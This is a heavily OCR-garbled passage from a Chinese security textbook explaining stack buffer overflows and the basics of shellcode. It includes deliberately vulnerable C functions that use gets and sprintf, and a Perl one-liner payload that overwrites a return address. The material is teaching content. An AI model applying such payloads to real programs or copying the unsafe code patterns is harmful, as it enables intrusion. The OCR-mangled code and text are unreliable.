返回 时 ， 也 可 能 保存 它 希 望 继续 使 用 的 寄存 器 变量 的 值 。 所 有 这 些 数据 一 般 都 保存 在 栈 的 一 个 
BARB (stack frame) 的 结构 中 。 被 调用 的 函数 也 需要 一 些 存储 单元 保存 它 的 局 部 变量 。 
每 一 次 调用 所 使 用 的 某 些 位 置 是 不 同 的 ， 这 样 ， 一 个 郴 数 才 有 可 能 直接 或 者 间接 地 调用 它 自 
身 ， 这 就 是 递归 函数 调用 9?。 在 大 部 分 现代 程序 设计 语言 中 ,包括 C 语 言 ， 局 部 变量 也 被 存储 


O 早期 的 程序 设计 语言 ， 例 如 Fortran， 并 不 支持 这 种 技术 ， 因 而 Fortran 函数 不 能 递归 调用 。 
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在 函数 的 栈 帧 中 。 那 么 需要 的 更 深 一 层 的 信息 是 把 这 些 栈 帧 链接 在 一 起 的 一 些 方法 ， 这 样 当 一 
个 函数 正在 退出 时 ， 在 将 控制 权 转 移 到 返回 地 址 之 前 ， 它 能 够 p 
恢复 调用 函数 的 栈 帧 。 图 10-3 给 出 了 这 样 的 一 个 栈 帧 结构 。 
一 个 函数 P 调用 另 一 个 函数 Q 的 一 般 过 程 可 以 总 结 如 下 ， 调 
用 函数 P: 

1. 为 被 调用 的 函数 压 人 参数 进 栈 (一 般 是 按照 参数 声明 的 
相反 顺序 进行 )。 

2. 执行 call 指令 调用 目标 函数 ， 压 人 返回 地 址 进 栈 。 

被 调用 的 函数 Q: 

3. 压 人 当前 的 帧 指针 (也 就 是 图 10-2 中 的 基地 址 指针 ， 
指向 其 调用 函数 的 栈 帧 ) 的 值 到 栈 。 

4. 将 当前 栈 指针 的 值 (也 就 是 第 3 步 中 的 帧 指针 的 地 
址 ) 赋值 给 帧 指针 ， 使 之 与 分 配给 被 调用 函数 的 新 栈 帧 位 置 相 
一 致 。 

5. 通过 向 下 移动 栈 指针 ， 在 其 与 前 述 的 帧 指针 的 位 置 之 间 
留 下 足够 大 容量 的 方式 ， 为 被 调用 函数 的 局 部 变量 分 配 空间 。 一 一 -一 

6. 运行 被 调用 函数 的 函数 体 。 图 10-3 ”函数 P 和 Q 的 栈 帧 示例 

7. 当 被 调用 函数 退出 时 ， 它 首先 将 帧 指针 值 再 赋值 给 栈 
指针 (这 样 可 以 有 效 释 放 其 局 部 变量 所 使 用 的 地 址 空间 )。 

8. 将 前 一 个 函数 的 帧 指针 值 弹出 栈 (这 样 就 恢复 了 与 调用 函数 的 栈 帧 的 链接 )。 

9. 执行 返回 指令 ， 将 保存 的 地 址 从 栈 中 弹出 ， 并 将 控制 权 返 回 给 调用 函数 。 

最 后 ， 调 用 函数 : 

10. 将 被 调用 函数 的 参数 从 栈 中 弹出 。 

11. 继续 执行 调用 函数 中 下 面 的 指令 。 

正如 我 们 以 前 指出 的 那样 ， 这 些 步 又 的 具体 实现 依赖 于 程序 设计 语言 、 编 译 器 和 处 理 器 的 
体系 结构 ， 但 大 多 数 情况 下 的 流程 总 是 与 此 相似 的 。 此 外 ， 这 里 没有 特别 说 明 的 是 ， 调 用 函数 
和 被 调用 函数 如 何在 函数 调用 前 / 后 保存 寄存 器 状态 以 维护 执行 环境 。 这 些 步骤 通常 发 生 在 调 
用 函数 压 人 参数 之 前 ， 或 者 在 被 调用 函数 为 其 局 部 变量 分 配 空间 之 后 。 不 管 哪 种 情况 都 不 会 影 
响 我 们 下 面 讨论 的 缓冲 区 溢出 的 操作 。 关 于 函数 调用 和 返回 机 制 、 栈 帧 的 结构 和 使 用 等 更 多 的 
细节 可 以 查阅 文献 [STAL13]。 

实现 栈 溢 出 的 实例 ”基于 前 面 的 背景 ， 我 们 讨论 在 10.1 节 中 介绍 的 基本 缓冲 区 溢出 的 影 
响 。 因 为 局 部 变量 存储 在 被 保存 的 帧 指针 和 返回 地 址 之 下 ， 利 用 一 个 缓冲 区 局 部 变量 溢出 的 漏 
洞 来 改写 这 两 个 对 每 个 函数 都 至 关 重 要 的 关联 值 中 的 一 个 或 者 全 部 ， 是 完全 可 能 的 。 我 们 注意 
到 ， 在 栈 帧 中 为 局 部 变量 分 配 内 存 空间 一 般 是 按照 声明 的 顺序 进行 的 ， 在 内 存 中 从 栈 的 顶部 向 
下 逐渐 增长 。 编 译 器 优化 可 能 改变 这 个 情况 ， 因 而 实际 的 布局 将 按照 任何 具体 程序 的 偏好 来 确 
定 。 这 种 改写 保存 的 帧 指针 和 返回 地 址 的 可 能 性 ， 形 成 了 栈 溢出 攻击 的 核心 。 

在 这 一 点 上 ， 我 们 退 一 步 ， 从 更 广阔 的 视角 来 看 运行 着 的 程序 ， 以 及 程序 代码 、 全 局 数 
据 、 堆 和 栈 等 关键 区 域 ， 这 是 非常 有 用 的 。 当 一 个 程序 运行 时 ， 通 常 操 作 系统 为 它 创建 一 个 新 
的 进程 。 进 程 被 分 配给 属于 它 自 己 的 虚拟 地 址 空间 ， 图 10-4 显示 了 该 虚拟 地 址 空间 的 一 般 结 
构 。 从 图 中 观察 到 ， 可 执行 程序 文件 的 内 容 (包括 全 局 数据 、 重 定位 表 和 实际 的 程序 代码 段 ) 
距离 这 个 地 址 空间 的 底部 很 近 ， 程 序 的 堆 区 被 直接 分 配 在 代码 区 之 上 ， 而 栈 区 是 从 中 部 附近 
(如 果 内 核 空间 (kernel space) 的 地 址 被 保留 在 上 半 部 ) 或 者 顶部 开始 向 下 分 配 。 因 而 我 们 讨论 
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的 栈 帧 在 栈 区 逐渐 向 下 分 配 ， 正 如 栈 通 过 内 存 向 下 逐渐 增加 一 样 。 稍 后 我 们 回 过 头 来 讨论 一 些 
其 他 部 分 。 有 关 进 程 地 址 空间 布局 的 进一步 wee 
细节 可 以 参考 [STAL14C]。 器 里 的 情况 

为 了 说 明 经 典 的 栈 溢出 的 操作 ， 我 们 讨 
论 在 图 10-5a 中 给 出 的 C 语言 的 函数 。 该 
函数 包含 一 个 局 部 变量 ， 即 缓冲 区 inp。 这 
个 变量 保存 在 这 个 函数 的 栈 帧 里 ， 在 保存 
的 帧 指针 和 返回 地 址 之 下 给 它 分 配 了 空间 ， 
如 图 10-6 所 示 。 这 个 hello 函数 (经 典 的 
Hello World 程序 的 一 个 版 本 ) 使 用 不 安全 
的 库 例 程 gets) 将 一 个 名 字 读 入 缓冲 区 inp 
中 ， 并 且 立 即 执行 。 接 下 来 它 使 用 库 例 程 
printf) 显示 出 读 人 的 名 字 。 只 要 读 人 一 个 
较 短 的 值 就 不 会 出 现 问题 ， 程 序 能 够 成 功 调 
用 这 个 函数 ， 正 如 图 10-56 中 程序 示例 第 一 
次 运行 显示 的 那样 。 然 而 ， 如 果 输 入 太 多 的 
数据 ， 就 像 图 10-5b 中 程序 示例 第 二 次 运行 
显示 的 一 样 ， 数 据 扩张 超出 缓冲 区 的 末端 ， 
最 终 用 垃圾 值 (与 提供 的 字符 串 的 二 进 制 表 
示 一 致 ) 改写 了 保存 的 帧 指针 和 返回 地 址 。 
接着 ， 当 函数 企图 将 控制 权 转移 到 返回 地 址 
时 ,很 显然 它 跳 转 到 了 一 个 非法 的 内 存 地 址 ， 『 
导致 程序 的 段 错误 (Segmentation Fault) 和 非 ”内存 底部 
正常 中 断 ， 如 图 10-5b 所 示 。 如 果 我 们 提供 图 10-4 ”程序 装载 到 进程 内 存 
10-5b 中 第 三 次 运行 时 显示 的 随机 输入 ， 明 显 
导致 程序 崩溃 。 这 就 演示 了 一 个 基本 的 缓冲 区 溢出 攻击 。 一 旦 程序 月 溃 ， 就 不 能 再 满足 正在 运 
行 的 函数 或 者 服务 的 需要 。 于 是 ， 栈 溢出 很 轻易 地 就 能 导致 系统 上 一 些 形式 的 拒绝 服务 攻击 。 

对 攻击 者 来 说 ， 比 起 让 程序 立即 崩溃 ， 使 其 将 执行 控制 权 转 移 给 攻击 者 指定 的 位 置 和 代码 
显然 更 有 价值 。 最 简单 的 方法 ， 就 是 在 引起 缓冲 区 溢出 的 输入 中 将 会 覆盖 前 一 栈 帧 中 所 保存 返 
回 地 址 的 位 置 上 包含 一 个 攻击 者 选 定 的 目标 地 址 。 这 样 一 来 ， 当 被 攻击 的 函数 执行 完成 并 运行 
返回 指令 的 时 候 ， 其 不 会 返回 到 其 调用 函数 ， 而 是 跳 转 到 攻击 者 提供 的 地 址 ， 从 那里 开始 运行 
攻击 者 的 指令 。 

这 个 过 程 同样 可 以 用 图 10-5a 中 的 函数 示例 予以 说 明 。 具 体 地 说 ， 我 们 将 展示 缓冲 区 溢出 
如 何 能 够 使 得 hello 不 返回 到 调用 它 的 主 函 数 ， 而 是 重新 执行 它 自己 。 为 了 完成 这 个 工作 ， 我 
们 需要 找到 装载 hello 函数 的 地 址 。 从 前 面 有 关 进 程 创建 的 讨论 中 我 们 记得 ， 当 一 个 程序 运行 
时 ， 程 序 文 件 中 的 代码 和 全 局 数据 以 一 个 标准 方式 被 拷贝 到 进程 的 虚拟 地 址 空间 。 因 此 代码 
总 是 被 分 配 在 相同 的 存储 区 域 。 确 定 它 的 位 置 的 最 容易 的 方法 ， 是 在 目标 程序 和 分 解 的 目标 
函数 上 运行 调试 器 。 当 我 们 利用 包含 函数 hello 的 程序 示例 在 Knoppix 系统 上 运行 时 ， 使 用 
调试 器 能 够 发 现 函数 hello 的 地 址 为 0x08048394。 这 样 我 们 必须 使 用 这 个 地 址 值 改写 返回 地 
址 。 同 时 代码 检查 显示 缓冲 区 inp 被 放置 在 当前 帧 指针 以 下 的 24 个 字 节 内 ， 这 就 意味 着 需要 
24 个 字 节 的 内 容 填 满 缓 冲 区 ， 直 到 保存 的 帧 指针 。 为 了 使 这 个 示例 能 发 生 溢出 ， 我 们 使 用 字 
符 串 ABCDEFGHQRSTUVWXabcdefgh。 最 后 ， 为 了 改写 返回 地 址 ， 保 存 的 帧 指针 也 必须 要 


内 存 顶 部 





ZIO +E ŽB 247 


用 一 些 有 效 的 内 存 值 进行 改写 。 为 了 说 明 这 个 问题 ， 我 们 选择 一 个 栈 区 附近 合适 的 存储 单元 
0xbfffffe8。 因 为 奔腾 处 理 器 结构 使 用 一 个 从 小 到 大 的 数值 表示 形式 ， 一 个 更 复杂 的 情况 将 会 发 
生 。 这 就 意味 着 对 于 一 个 4 字 节 的 值 ， 例 如 我 们 这 里 讨论 的 地 址 值 ， 这 些 字 节 拷贝 到 内 存 中 应 
该 首先 是 最 低 字 节 ， 接 着 是 次 最 低 ， 最 后 完成 的 是 最 高 字 节 。 这 就 是 说 目标 地 址 0x08048394 
在 缓冲 区 里 必须 以 94 83 04 08 的 顺序 存储 ,保存 的 帧 指针 地 址 必须 以 同样 的 方法 处 理 。 因 为 
这 次 攻击 的 目标 是 再 次 调用 函数 hello， 第 二 行 输入 ， 连 同 在 每 一 行 末尾 的 新 行 符 ， 是 第 二 次 
运行 hello 需要 读 和 的， 也 就 是 字符 串 NNNN。 


void hello(char *tag) 


char inp[16]; 


printf ("Enter value for ts: ", tag); 
gets(inp); 
printf ("Hello your %s is %s\n", tag, inp); 





a) SEAR Ca RG 
$ cc -g -o buffer2 buffer2.c 


$ ./buffer2 

Enter value for name: Bill and Lawrie 
Hello your name is Bill and Lawrie 
buffer2 done 


$ ./buffer2 
Enter value for name: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXK 


Segmentation fault (core dumped) 


$ perl -e ‘print pack("H*", "414243444546474851525354555657586162636465666768 
e8ffffbf948304080a4e4e4e4e0a");' | ./buffer2 

Enter value for name: 

Hello your Re?pyy]uEA is ABCDEFGHQRSTUVWXabcdefguyu 

Enter value for Kyyu: 

Hello your Kyyu is NNNN 

Segmentation fault (core dumped) 





b) 实现 基本 栈 溢出 的 示例 的 运行 
图 10-5 实现 基本 栈 溢出 的 示例 


现在 我 们 已 经 确定 形成 缓冲 区 溢出 攻击 所 需要 的 字 节 。 最 后 一 个 复杂 的 问题 是 形成 目标 地 
址 所 需要 的 值 不 见得 都 是 可 打印 的 字符 。 这 样 需要 一 些 办 法 产生 一 个 合适 的 二 进 制 序 列 ， 并 将 
其 输入 到 目标 程序 中 。 .通常 我 们 需要 使 用 十 六 进 制 表 示 ， 并 在 接 下 来 设法 将 十 六 进 制 转换 成 二 
进 制 (比如 使 用 一 些小 程序 )。 此 处 以 演示 为 和 目 的， 我们 使 用 一 个 简单 的 只 有 一 行 的 Perl S 程 
序 ， 其 函数 pack() 能 很 容易 地 将 一 个 十 六 进 制 的 字符 串 转换 成 对 应 的 二 进 制 序列 ， 这 个 操作 
我 们 在 图 10-56 中 程序 示例 的 第 三 次 运行 中 可 以 看 到 。 综 合 上 面 列 出 的 所 有 因素 ， 我 们 找到 一 
个 十 六 进 制 字符 串 414243444546474851525354555657586162636465666768e8ffffbf948304080a4 
e4e4e4e0a， 它 被 Perl 程序 转换 成 二 进 制 输出 ， 通 过 管道 进入 目标 程序 buffer2， 如 图 10-5b 所 
示 。 我 们 观察 到 读 和 人 值 的 提示 和 显示 重复 了 两 次 ， 这 就 说 明 hello 函数 事实 上 被 再 次 执行 。 然 
而 ， 由 于 在 这 两 次 执行 以 后 ， 当 前 栈 帧 已 经 不 再 有 效 了 ， 故 当 hello 函数 企图 第 二 次 返回 的 时 
候 ， 它 跳 转 到 一 个 非法 的 内 存 地 址 ， 程 序 崩 省。 但 是 它 已 经 完成 了 攻击 者 一 开始 想 要 完成 的 工 


© Perl ( Practical Extraction and Report Language) 是 广泛 使 用 的 解释 型 脚本 语言 ， 它 经 常 默认 安装 在 UNIX 和 
Linux 及 其 衍生 的 操作 系统 中 ， 并 且 在 其 他 多 数 操作 系统 上 也 可 用 。 
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作 ! 在 这 个 例题 中 有 两 个 需要 关注 的 问题 ， 尽 管 在 第 一 次 提示 符 出 现时 提供 的 标识 值 是 正确 
的 . 但 是 在 显示 响应 的 时 候 它 就 已 经 被 破坏 了 。 这 是 由 于 用 于 结束 输入 字符 串 的 NULL 字符 
恰好 覆盖 了 位 于 返回 值 上 方 的 一 个 字 节 ， 而 这 个 字 节 原本 保存 着 参数 tag 的 地 址 。 这 就 使 得 这 
个 参数 的 指针 遭 到 修改 ， 指 向 了 修改 后 地 址 处 的 一 些 随机 字 节 。 而 当 hello 函数 第 二 次 运行 时 ， 
其 所 谓 的 “参数 tag” 则 与 位 于 返回 值 下 方 且 被 随机 改写 过 的 帧 指针 的 值 有 关 (因而 指向 了 内 
存 高 端的 某 个 位 置 )， 因 而 可 以 看 到 垃圾 字符 串 。 


gets (inp) gets (inp) 
人 调用 之 前 调用 之 后 asm 


bffffbe0 3e850408 
= 
= 
= 
bffffbcc TT 
ve 
pitti inpto 
图 10-6 基本 栈 溢出 的 栈 值 

攻击 过 程 在 图 10-6 中 有 进一步 的 说 明 。 图 中 显示 了 栈 帧 的 值 ， 包 括 调用 函数 gets0 以 前 和 调 
用 以 后 局 部 缓冲 区 变量 inp 的 值 。 先 看 一 下 调用 以 前 的 栈 帧 ， 我 们 发 现 缓冲 区 变量 inp 中 包含 一 些 
垃圾 值 ， 它 们 是 内 存 中 以 前 留 下 的 值 。 保 存 的 帧 指针 值 是 0xbffffbe8， 返 回 地 址 是 0x080483f。 
调用 函数 gets() 之 后 ， 在 缓冲 区 inp 包含 的 字母 字符 串 之 上 ， 保 存 的 帧 指针 变 成 0xbfffffe8， 返 
回 地 址 是 0x08048394， 与 我 们 在 攻击 字符 串 中 设置 的 一 样 。 我 们 也 注意 到 ， 参 数 tag 的 底部 字 
节 已 经 被 破坏 ， 存 储 着 前 面 提 到 的 NULL 的 值 0x00。 很 明显 攻击 正如 我 们 设计 的 那样 进行 。 

我 们 已 经 看 到 了 基本 的 栈 溢 出 是 如 何 进行 的 ， 下 面 研 究 更 复杂 的 溢出 是 如 何 发 生 的 。 很 
明显 ， 攻 击 者 能 够 使 用 任何 其 所 需要 的 值 改 写 返回 地 址 ， 不 仅仅 是 目标 函数 的 地 址 ， 可 以 是 任 
意 函 数 的 地 址 ， 或 者 是 程序 或 与 它 有 关 的 系统 库 中 出 现 的 一 系列 机 器 指令 的 实际 地 址 。 下 一 节 
我 们 将 探讨 这 种 变化 。 然 而 ， 原 来 使 用 的 攻击 方法 是 在 溢出 的 缓冲 区 里 包含 希望 执行 的 机 器 代 
码 。 也 就 是 说 ， 上 面 的 例子 作为 填充 使 用 的 不 是 字母 序列 ， 而 是 与 希望 执行 的 机 器 代码 对 应 的 
二 进 制 值 。 这 个 代码 被 称 为 shellcode， 我 们 将 简单 地 讨论 它 创 建 的 细节 。 在 这 种 情形 下 ， 在 攻 
击 中 使 用 的 返回 地 址 是 shellcode 的 起 始 地 址 ， 它 在 目标 函数 的 栈 帧 中 间 的 位 置 。 这 样 当 被 攻 
击 的 函数 返回 时 就 执行 攻击 者 选择 的 机 器 代码 。 

更 多 的 栈 溢出 漏洞 ”在 我 们 讨论 shellcode 的 设计 之 前 有 几 个 问题 需要 注意 ， 这 些 问 题 是 
关于 一 个 缓冲 区 溢出 攻击 的 目标 函数 的 结构 的 。 迄 今 为 止 ， 在 我 们 使 用 的 所 有 例子 中 都 是 读 
取 输 入 数据 时 发 生 缓冲 区 溢出 ， 这 是 早期 缓冲 区 溢出 攻击 采用 的 方法 ， 例 如 在 Morris 蠕虫 中 。 
然而 把 数据 复制 和 合并 到 缓冲 区 ， 也 有 发 生 缓冲 区 溢出 的 可 能 ， 因 为 缓冲 区 中 至 少 有 一 部 分 数 
据 是 从 程序 外 部 读 和 人 的。 如 果 程 序 没有 检查 缓冲 区 的 大 小 ， 或 者 复制 的 数据 没有 正确 中 断 ， 也 
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能 够 发 生 缓 冲 区 溢出 。 一 个 程序 能 够 安全 读 人 并 保存 输入 数据 ， 并 将 它 传 递 给 周围 的 程序 ， 过 
一 段 时 间 另 一 个 函数 没有 安全 地 复制 它 ， 这 也 可 能 造成 一 个 缓冲 区 溢出 。 图 10-7a 中 的 程序 示 
例 说 明了 这 种 行为 。 主 函数 main) 包含 了 缓冲 区 buf, CH buf 的 长 度 传递 给 函数 getinp), K 
数 getinp() 使 用 库 例 程 fgets) 安全 读 人 一 个 值 。 这 个 例 程 保 证 读 人 的 字符 个 数 不 会 多 于 缓冲 
区 的 长 度 ， 并 允许 末尾 的 NULL 存储 。 接 着 函数 getinp() 返回 到 主 函 数 main()， 随 之 主 函 数 
main() 用 buf 的 值 作为 参数 调用 函数 display0， 这 个 函数 在 被 称 为 tmp 的 第 二 个 局 部 缓冲 区 中 
建立 一 个 响应 的 字符 串 并 进行 显示 。 令 人 遗憾 的 是 ， 库 例 程 sprint) 是 另 一 个 常用 的 不 安全 
的 C 语言 库 例 程 ， 它 没有 正确 检查 是 否 将 太 多 的 数据 写 到 目标 缓冲 区 中 。 在 这 个 例子 中 我 们 
注意 到 缓冲 区 的 长 度 都 是 相同 的 ， 在 C 语言 的 程序 中 这 是 非常 普遍 的 ， 尽 管 相 对 于 这 些 程序 
示例 使 用 的 空间 来 说 它们 是 相当 大 的 。 事 实 上 ， 在 标准 C 语言 的 IO 库 中 有 一 个 被 定义 的 常量 
BUFSIZ， 它 是 输入 缓冲 区 的 默认 长 度 。 在 C 语言 的 程序 中 经 常 把 这 个 常量 当 作 一 个 输入 缓冲 
区 的 标准 长 度 。 问 题 是 当 数 据 被 合并 到 一 个 含有 另 一 个 缓冲 区 的 内 容 的 缓冲 区 时 ， 这 使 得 所 需 
要 的 空间 就 会 超出 有 效 空 间 ， 就 像 在 这 个 例子 中 它 所 做 的 那样 。 现 在 ， 我 们 来 看 图 10-7b 中 显 
示 的 这 个 程序 的 运行 情况 。 第 一 次 运行 的 时 候 读 的 值 很 短 ， 被 合并 的 值 没 有 破坏 栈 帧 。 第 二 次 
运行 的 时 候 提 供 的 输入 太 长 了 。 然 而 ， 因 为 使 用 的 是 一 个 安全 的 输入 函数 ， 仅 仅 读 和 人 15 个 字 
符 ， 正 如 紧 随 其 后 的 那 一 行 显示 的 那样 。 接 下 来 当 这 个 字符 串 与 响应 字符 串 合 并 时 ， 合 并 后 的 
长 度 超过 目标 缓冲 区 的 有 效 空 间 。 实 际 上 ， 它 改写 了 保存 的 帧 指针 ， 但 是 没有 改写 返回 地 址 。 
这 样 函 数 返 回 ， 正 如 主 函 数 main() 打印 的 信息 所 表明 的 那样 。 但 是 ， 当 主 函 数 main) RAB 
回 时 ， 因 为 它 的 栈 帧 已 经 被 破坏 ， 现 在 只 是 一 些 随机 值 ， 程 序 跳 转 到 一 个 非法 的 地 址 ， 随 之 出 
省 。 在 这 种 情况 下 合并 的 结果 不 一 定 能 到 达 返 回 地 址 ， 除 非 使 用 一 个 较 大 的 缓冲 区 才 有 可 能 。 


void gctinp{ohar *inp, int siz) 


puts("Input value: "); 
fgets(inp, siz, stdin); 
printf ("buffer3 getinp read ts\n", inp); 


} 


void display (char *val) 
{ 


char tmp[16]; 
sprintf (tmp, "read val: %s\n", val); 
puts (tmp) ; 


int main(int argc, char targv[]) 


char buf [16]; 

getinp (buf, sizeof (buf)); 
display (buf) ; 

printf ("buffer3 done\n" 


} 





a) 实现 栈 溢出 的 另 一 段 C 代 码 


$ cc -o buffer3 buffer3.c 


$ ./buffer3 
Input value: 


buffer3 getinp read SAFE 
read val: SAFE 
buffer3 done 


$ ./buffer3 


x 
buffer3 getinp read XXXX: 
read val: XXXXXXXXXXXXXXX 


buffer3 done 
Segmentation fault (core dumped) 


b) 另 一 个 栈 溢出 示例 的 运行 
图 10-7 栈 洲 出 的 另 一 个 示例 
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这 表明 当 我 们 寻找 缓冲 区 溢出 时 ， 复 制 和 合并 外 部 数据 源 的 所 有 地 方 都 可 能 会 发 生 缓冲 区 
溢出 。 我 们 注意 到 ， 缓 冲 区 溢出 不 一 定 必须 发 生 在 一 个 程序 的 代码 中 ， 它 们 也 能 (事实 上 的 确 
可 以 ) 发 生 在 程序 调用 的 库 例 程 中 ， 包 括 标准 库 和 第 三 方 应 用 的 库 。 因 而 ， 不 管 是 对 攻击 者 还 
是 对 防御 者 来 说 ， 可 能 发 生 缓冲 区 溢出 的 范围 太 大 了 。 在 表 10-2 9 中 给 出 了 一 些 最 常见 的 不 安 
全 的 标准 C 语言 库 例 程 的 列表 。 所 有 这 些 函 数 都 是 可 疑 的 ， 没 有 检查 和 预先 转换 数据 的 总 长 
度 就 不 能 使 用 这 些 函 数 ， 或 者 最 好 替换 成 安全 的 函数 。 


表 10-2 一 些 常 见 的 不 安全 的 C 语言 标准 库 例 程 


gets(char *str ) 从 标准 输入 读 一 行 到 字符 串 str 中 

sprintf(char *str, char *format, -- ) 根据 提供 的 格式 和 变量 建立 字符 串 str 
strcat(char *dest, char *src ) 将 字符 串 sre 的 内 容 追 加 到 字符 串 dest 
strcpy(char *dest，char *src ) 将 字符 串 sro 的 内 容 复制 到 字符 串 dest 
vsprintf(char *str, char *fmt, va_list ap ) 根据 提供 的 格式 和 变量 建立 字符 串 str 


在 我 们 讨论 shellcode 的 细节 之 前 还 需要 进一步 关注 的 一 个 问题 就 是 ， 各 种 各 样 的 基于 栈 
的 缓冲 区 溢出 的 结果 表明 ， 在 栈 项 部 附近 的 内 存 发 生 了 重大 的 变化 。 特 别 是 返回 地 址 和 指向 旧 
的 栈 帧 的 指针 都 已 被 毁坏 ， 这 就 是 说 在 攻击 者 的 代码 运行 之 后 很 难 恢复 程序 状态 并 继续 运行 。 
对 于 攻击 者 来 说 这 无 关 紧 要 ， 毕 竟 其 通常 的 做 法 本 来 就 要 用 一 个 shell 命令 替代 现 有 的 程序 代 
码 。 但 是 即使 攻击 者 不 这 样 做 ， 要 想 让 受到 攻击 的 程序 继续 正常 运行 也 是 不 太 可 能 的 。 攻 击 的 
任何 尝试 都 将 使 程序 崩溃 。 这 就 意味 着 一 个 成 功 的 缓冲 区 溢出 攻击 都 会 导致 被 攻击 的 程序 提供 
的 函数 和 服务 丢失 。 这 一 后 果 有 多 严重 、 多 醒目 ， 很 大 程度 上 取决 于 被 攻击 的 程序 及 其 运行 的 
环境 。 如 果 它 是 一 个 客户 端的 进程 或 者 线程 ， 正 在 为 个 人 请 求 服务 ， 除 去 可 能 日 志 中 有 一 些 错 
误 信息 以 外 ， 后 果 是 很 小 的 。 然 而 ， 如 果 它 是 一 个 重要 的 服务 ， 它 的 丢失 在 系统 上 产生 一 个 显 
著 的 影响 ， 就 会 使 用 户 和 管理 员 意识 到 系统 存在 问题 。 


10.1.3 shellcode 


很 多 缓冲 区 溢出 攻击 的 一 个 基本 部 分 是 程序 的 执行 会 被 转移 到 攻击 者 提供 的 保存 在 发 生 
溢出 的 缓冲 区 中 的 代码 。 这 些 代码 被 称 为 shellcode， 由 于 通常 它 的 功能 是 将 控制 权 转 移 给 一 
个 用 户 的 命令 行 解释 器 或 者 shell， 因 此 利用 被 攻击 程序 的 特权 可 以 访问 系统 上 任何 可 用 的 程 
序 。 在 UNIX 系统 上 ， 通 过 编译 代码 调用 系统 函数 EXECVE (bin/sh") 就 可 以 完成 ， 其 中 
用 Bourne shell (或 者 攻击 者 选择 的 其 他 任何 shell) 的 shellcode 来 代替 当前 的 程序 代码 。 在 
Windows 系统 上 ， 通 常 包 括 一 个 对 函数 system ("command.exe") ( 较 早 的 系统 是 "cmd.exe") 的 
调用 来 运行 DOS Command shell。shellcode 仅仅 是 指 机 器 代码 ， 是 与 机 器 指令 和 数据 值 相 对 应 
的 一 串 二 进 制 值 ， 而 这 些 指 令 和 数据 值 能 够 使 攻击 者 实现 期 望 的 功能 。 也 就 是 说 ， 当 shellcode 
需要 在 目标 系统 上 运行 或 者 与 其 系统 函数 交互 时 ， 它 依赖 于 特定 的 处 理 器 结构 ， 事 实 上 ， 通 常 
是 依赖 于 特定 的 操作 系统 。 这 也 就 是 为 什么 缓冲 区 溢出 攻击 总 是 针对 特定 操作 系统 上 运行 的 
特定 软件 的 一 个 主要 原因 。 因 为 shellcode 是 机 器 代码 ， 要 编写 它 需 要 熟悉 汇编 语言 和 目标 
系统 的 操作 。 事 实 上 有 很 多 编写 shellcode 的 经 典 的 指导 资料 ， 包 括 最 初 的 文献 [LEVY96]， 
都 假定 读者 具备 这 些 知 识 。 然 而 ， 最 近 很 多 的 站 点 和 工具 已 经 被 开发 出 来 ， 使 得 shellcode 
的 开发 过 程 自动 化 了 (就 像 安全 漏洞 开发 一 样 )， 因 而 ， 有 众多 的 潜在 的 用 户 都 在 做 shellcode 


”还 有 可 能 经 常 使 用 的 其 他 不 安全 例 程 ， 包 括 O/S 中 一 些 特 殊 的 例 程 。 微 软 维护 着 不 安全 的 Windows 库 调 用 
的 一 个 列表 ， 如 果 是 Windows 系统 编程 可 以 查阅 这 个 列表 [HOWA07]。 
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攻击 的 开发 。Metasploit 项 目 就 是 这 样 的 一 个 站 点 ， 其 目标 是 为 进行 渗透 测试 、IDS 特征 码 
开发 和 攻击 研究 的 人 们 提供 有 用 的 信息 ; 站 点 中 还 包括 一 个 高 级 的 开源 平台 ， 用 于 开发 、 测 
试 和 使 用 攻击 代码 ， 使 用 它们 能 够 创建 shellcode 完成 多 种 任务 并 攻击 一 系列 已 知 的 缓冲 区 
溢出 漏洞 。 

shellcode 的 开发 ”为 了 对 shellcode 的 基本 结构 有 更 深 的 认识 ， 我 们 讨论 一 个 简单 经 典 
的 shellcode 攻击 的 开发 ， 它 可 以 简单 地 启动 一 个 Intel Linux 系统 的 Bourne shell。shellcode 
需要 实现 图 10-8a 显示 的 函数 的 功能 ，shellcode 为 系统 函数 EXECVEO 配置 需要 的 参数 ， 包 
括 合适 的 最 少 的 参数 和 环境 列表 ， 并 接着 调用 这 个 函数 。 为 了 要 产生 shellcode， 高 级 程 
序 语 言 规定 必须 首先 编译 成 等 价 的 机 器 语言 。 然 而 ， 接 下 来 必须 要 做 很 多 的 变化 。 首 先 ， 
EXECVE(sh,args,NULL) 是 一 个 库 函 数 ， 它 将 提供 的 参数 依次 配置 到 正确 的 存储 单元 (Linux 下 
是 机 器 的 寄存 器 )， 接 着 触发 一 个 软件 中 断 调 用 内 核 完 成 希望 的 系统 调用 。 为 了 在 shellcode 中 
使 用 ， 这 些 指令 必须 内 散在 shellcode 中 ， 而 不 依赖 库 函 数 。 

对 shellcode 的 内 容 也 有 几 个 一 般 的 约束 条 件 。 首 先 ， 它 必须 是 浮动 地 址 (position 
independent)， 这 就 是 说 ， 它 不 能 包含 任何 属于 它 自己 的 绝对 地 址 ， 因 为 攻击 者 一 般 不 能 预先 
准确 确定 在 函数 的 栈 帧 里 目标 缓冲 区 设置 在 什么 地 方 。 当 目标 程序 里 的 执行 流 有 一 个 函数 调用 
其 他 的 函数 时 ， 这 些 栈 帧 从 栈 的 顶部 开始 向 下 创建 ， 在 其 他 的 栈 帧 之 下 建立 下 一 个 栈 帧 。 帧 的 
编号 和 缓冲 区 最 后 的 存储 单元 依赖 于 通 向 目标 函数 的 函数 调用 的 精确 次 序 。 这 个 函数 可 能 在 程 
序 中 几 个 不 同 的 地 方 被 调用 ， 可 能 函数 调用 的 次 序 不 同 ， 或 者 在 最 后 被 调用 之 前 使 用 栈 的 临时 
局 部 值 的 数量 不 同 ， 这 样 ， 攻 击 者 对 栈 帧 的 位 置 只 有 一 个 大 概 的 认识 ， 他 一 般 不 能 准确 决定 栈 
帧 的 位 置 。 所 有 这 些 都 意味 着 shellcode 在 内 存 里 的 任何 位 置 都 能 运行 。 这 就 是 说 ， 只 要 使 用 相 
对 地 址 代替 当前 指令 的 地 址 即 可 。 这 也 意味 着 攻击 者 不 能 准确 指定 shellcode 中 指令 的 初始 地 址 。 

shellcode 的 另 一 个 约束 条 件 是 它 不 能 包含 任何 NULL 字符 。 没 有 NULL 才能 保证 全 部 
的 shellcode 能 首先 被 复制 到 缓冲 区 里 。 在 本 章 中 我 们 讨论 的 所 有 缓冲 区 溢出 的 例子 都 涉及 使 
